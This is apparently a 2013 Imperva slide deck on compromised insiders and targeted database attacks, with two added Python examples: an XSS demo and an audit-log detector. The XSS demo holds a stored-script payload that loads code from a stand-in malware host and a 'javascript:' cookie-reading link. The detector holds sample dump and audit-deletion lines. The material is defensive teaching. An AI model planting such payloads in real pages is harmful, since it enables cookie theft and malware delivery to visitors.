Targeted Defense for Malware & Targeted Attacks
© 2013 Imperva, Inc. All rights reserved.
Barry Shteiman, Senior Security Strategist
Contents
§ Compromised Insider
§ Incident Analysis
§ Anatomy of an Attack
§ Current Controls
§ Reclaiming Security
Compromised Insider
Defining the Threat Landscape
“There are two types of companies: companies that have been breached and companies that don’t know they’ve been breached.”
Shawn Henry, Former FBI Executive Assistant Director. NY Times, April 2012
Insider Threat Defined
Risk that the access rights of a trusted person will be used to view, take or modify data or intellectual property.
Possible causes:
§ Accident
§ Malicious intent
§ Compromised device
Compromised Insider Defined
A person with no malicious motivation who becomes an unknowing accomplice of third parties who gain access to their device and/or user credentials.
Malicious Vs. Compromised Potential
1% < 100%: only a small minority of insiders is malicious, but every insider can be compromised.
Source: http://edocumentsciences.com/defend-against-compromised-insiders
Look Who Made the Headlines
Hackers steal sensitive data related to a planned 2.4B acquisition.
Hacker stole 4 million Social Security numbers and bank account information from state taxpayers and businesses
Know Your Attacker
Governments
• Stealing intellectual property (IP) and raw data; espionage
• Motivated by: policy, politics and nationalism
Industrialized hackers
• Stealing IP and data
• Motivated by: profit
Hacktivists
• Exposing IP and data, and compromising the infrastructure
• Motivated by: political causes, ideology, personal agendas
What Attackers Are After
Source: Verizon Data Breach Report, 2013
Two Paths, One Goal
Goal: Data & IP
Path 1: the online application, reached by hacking (used in 52% of breaches); servers were the asset involved in 54% of breaches.
Path 2: a user with access rights (or his/her device), reached by malware (40%) or social engineering (29%); user devices were involved in 71% of breaches and people in 29%.
Source: Verizon Data Breach Report, 2013
Incident Analysis
The South Carolina Data Breach
What Happened?
4M individual records stolen from a population of 5M: about 80% of the state’s residents.
A Targeted Database Attack
13-Aug-12: attacker steals login credentials via phishing email and malware
27-Aug-12: attacker logs in remotely and accesses the database
29-Aug-12 to 11-Sept-12: additional reconnaissance, more credentials stolen
12-Sept-12 to 14-Sept-12: attacker steals the entire database
The Anatomy of an Attack
How Does It Work
The stages, in order:
§ Spear Phishing
§ C&C Comm
§ Data Dump & Analysis
§ Broaden Infection
§ Main Data Dump
§ Wipe Evidence
Searching on Social Networks…
…The Results
Next: Phishing and Malware
How easy is it?
Specialized frameworks and hacking tools, such as BlackHole 2.0, allow easy setup for host hijacking and phishing.
§ A three-month BlackHole license, with support included, is US$700
Drive-by Downloads Are Another Route
September 2012: the “iPhone 5 Images Leak” lure delivered a Trojan by drive-by download.
Cross Site Scripting Is Yet Another Path
Persistent XSS vulnerabilities on popular sites provide the infection platform:
§ Gmail, June 2012
§ Tumblr, July 2012
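Stored (persistent) XSS is the mechanism behind the slide's point that a vulnerable site becomes the infection platform: the script an attacker stores once is served by the trusted site to every visitor who views that page. The Python below is an added example written for this page, not code from the deck or from the Gmail and Tumblr cases it cites; the comment fields, the malware.example hostname and the two rendering functions are constructed for illustration. It places the vulnerable rendering beside the hardened one and covers the case html.escape alone does not: a javascript: URL in an href attribute.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker input (not from the original deck): a stored "comment" whose
# body pulls a script from a hypothetical malware host and whose profile link hides
# a javascript: URL. Every visitor who views the page would run both.
MALICIOUS_COMMENT = {
    "author": "friendly user",
    "body": '<script src="http://malware.example/x.js"></script>',
    "link": "javascript:alert(document.cookie)",
}


def render_vulnerable(comment):
    """Persistent XSS: stored fields are interpolated into the page unchanged."""
    return (
        f'<div class="comment"><a href="{comment["link"]}">{comment["author"]}</a>'
        f'<p>{comment["body"]}</p></div>'
    )


SAFE_SCHEMES = {"http", "https"}


def safe_href(url):
    """Keep only absolute http(s) URLs; javascript:, data:, vbscript: and
    scheme-less junk become a harmless placeholder. Escaping alone does not help
    here: 'javascript:alert(1)' contains nothing html.escape would change."""
    url = url.strip()
    parts = urlsplit(url)
    if parts.scheme.lower() not in SAFE_SCHEMES or not parts.netloc:
        return "#"
    return html.escape(url, quote=True)


def render_safe(comment):
    """Escape text and attribute values (quote=True also escapes the quotes that
    would break out of an attribute) and validate the URL scheme separately."""
    return (
        f'<div class="comment"><a href="{safe_href(comment["link"])}">'
        f'{html.escape(comment["author"], quote=True)}</a>'
        f'<p>{html.escape(comment["body"], quote=True)}</p></div>'
    )


def contains_active_content(rendered):
    """Crude check for the two payloads above; a real test loads the page in a browser."""
    low = rendered.lower()
    return "<script" in low or "javascript:" in low


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(MALICIOUS_COMMENT))
    print("hardened:  ", render_safe(MALICIOUS_COMMENT))
```

Output encoding has to match the context the value lands in: text nodes and quoted attributes are handled by html.escape, but a URL attribute needs a scheme allow-list, and anything reaching a script block or an event handler should not be there at all. A Content-Security-Policy that disallows inline and third-party scripts is the defence-in-depth layer for the cases the templating misses.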
The Human Behavior Factor
Source: Google Research Paper “Alice in Warningland”, July 2013
Current Controls
Won’t the NGFW/IPS/AV Stop It?
What Are the Experts Saying?
“Flame was a failure for the antivirus industry. We really should have been able to do better. But we didn’t. We were out of our league, in our own game.”
Mikko Hypponen, Chief Research Officer, F-Secure. Source: http://www.wired.com/threatlevel/2012/06/internet-security-fail/
Security Threats Have Evolved…
(Figure: the same three controls in 2001 and in 2013: AntiVirus, Firewall, IPS.)
Sources: Gartner, Imperva analysis
Security Redefined
Forward Thinking
The DISA Angle
“In the past, we’ve all been about protecting our networks—firewall here, firewall there, firewall within a service, firewall within an organization, firewalls within DISA. We’ve got to remove those and go to protecting the data.”
Lt. Gen. Ronnie Hawkins Jr., DISA. AFCEA, July 2012
Rebalance Your Security Portfolio
Assume You Can Be Breached
Incident Response Phases for Targeted Attacks
Defender phases:
§ Reduce Risk
§ Prevent Compromise
§ Detection
§ Containment
§ Insulate sensitive data
§ Password Remediation
§ Device Remediation
§ Post-incident Analysis
Attacker steps:
§ Size Up the Target
§ Compromise a User
§ Initial Exploration
§ Solidify Presence
§ Impersonate Privileged User
§ Steal Confidential Data
§ Cover Tracks
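Three of the attacker steps on this slide, and the matching dates in the South Carolina timeline earlier in the deck, leave traces in a database audit trail: a remote login from a host the account has never used (Compromise a User, Impersonate Privileged User), a read far larger than anything the account normally runs (Steal Confidential Data), and a statement that edits the audit trail itself (Cover Tracks). The Python below is an added example written for this page, not Imperva product logic and not code from the original deck; the log format, the sample lines (which borrow the slide's dates) and the two thresholds are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Audit-log format assumed for this example (not a real product's schema):
#   <ISO timestamp> <LOGIN|QUERY> user=<account> src=<ip> [rows=<count> sql=<statement>]
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<event>LOGIN|QUERY) user=(?P<user>\S+) src=(?P<src>\S+)"
    r"(?: rows=(?P<rows>\d+))?(?: sql=(?P<sql>.*))?$"
)

# Statements that rewrite or remove the audit trail itself ("Cover Tracks").
AUDIT_TAMPER_RE = re.compile(
    r"\b(DELETE|TRUNCATE|DROP|UPDATE|ALTER)\b[^;]*\baudit", re.IGNORECASE
)

MIN_BULK_ROWS = 1000  # reads below this are never called a dump (threshold is an assumption)
BULK_FACTOR = 10      # nor reads under 10x the account's largest previously accepted read

# Constructed sample log (not real data); the dates follow the South Carolina timeline
# on the slides. 10.1.20.15 stands for the account's usual workstation, 198.51.100.77
# (a documentation-range address) for the attacker's remote host.
SAMPLE_LOG = """\
2012-08-01T09:02:11 LOGIN user=jdoe src=10.1.20.15
2012-08-01T09:03:40 QUERY user=jdoe src=10.1.20.15 rows=120 sql=SELECT * FROM taxpayers WHERE id=4412
2012-08-02T10:11:02 LOGIN user=jdoe src=10.1.20.15
2012-08-02T10:12:19 QUERY user=jdoe src=10.1.20.15 rows=85 sql=SELECT name, ssn FROM taxpayers WHERE id=9930
2012-08-27T23:41:07 LOGIN user=jdoe src=198.51.100.77
2012-09-12T02:15:33 QUERY user=jdoe src=198.51.100.77 rows=3850000 sql=SELECT * FROM taxpayers
2012-09-14T03:50:01 QUERY user=jdoe src=198.51.100.77 rows=0 sql=DELETE FROM audit_log WHERE ts < '2012-09-14'
"""


def parse(line):
    """Parse one audit line into a dict, or return None for lines in another format."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["rows"] = int(rec["rows"]) if rec["rows"] is not None else 0
    rec["sql"] = rec["sql"] or ""
    return rec


def detect(log_text):
    """Return (timestamp, user, alert) tuples in log order, one per suspicious event."""
    alerts = []
    seen_src = defaultdict(set)  # account -> source addresses it has logged in from
    max_rows = defaultdict(int)  # account -> largest read that was not itself flagged

    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ts, user, src = rec["ts"], rec["user"], rec["src"]

        if rec["event"] == "LOGIN":
            # The first login ever seen for an account is the baseline, not an alert.
            if seen_src[user] and src not in seen_src[user]:
                alerts.append((ts, user, f"login from new source {src}"))
            seen_src[user].add(src)

        elif rec["event"] == "QUERY":
            if AUDIT_TAMPER_RE.search(rec["sql"]):
                alerts.append((ts, user, "audit trail tampering"))
            threshold = max(MIN_BULK_ROWS, BULK_FACTOR * max_rows[user])
            if rec["rows"] > threshold:
                alerts.append((ts, user,
                               f"bulk read of {rec['rows']} rows (baseline max {max_rows[user]})"))
            else:
                # Flagged reads never raise the baseline, so a dump cannot normalise itself.
                max_rows[user] = max(max_rows[user], rec["rows"])
    return alerts


if __name__ == "__main__":
    for ts, user, alert in detect(SAMPLE_LOG):
        print(f"{ts} {user}: {alert}")
```

Against the constructed log, detect() returns three alerts, one per stage, and the 27-Aug login alone would have given the defender two weeks before the dump. Two caveats a practitioner would add: the bulk threshold is only as good as the per-account baseline, so it needs a learning period before it is enforced, and the tamper rule only works if audit records are shipped off the database host before the DELETE runs; a log the attacker can delete is not evidence.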
www.imperva.com